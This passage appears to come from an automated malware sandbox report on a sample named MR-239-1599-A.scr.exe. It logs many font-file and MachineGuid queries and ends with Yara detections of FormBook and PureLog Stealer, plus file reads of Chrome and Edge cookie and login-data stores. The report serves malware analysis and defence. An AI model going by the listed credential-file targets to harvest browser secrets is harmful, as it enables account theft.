                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 3.2.MR-239-1599-A.scr.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.MR-239-1599-A.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.4094770900.0000000004C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4093386507.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4093292133.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1946088682.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1948359702.0000000003660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.4092996752.0000000004050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 0.2.MR-239-1599-A.scr.exe.7620000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.MR-239-1599-A.scr.exe.2d8fe28.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.MR-239-1599-A.scr.exe.2d8fe28.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.MR-239-1599-A.scr.exe.7620000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1654874999.0000000007620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1651899586.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
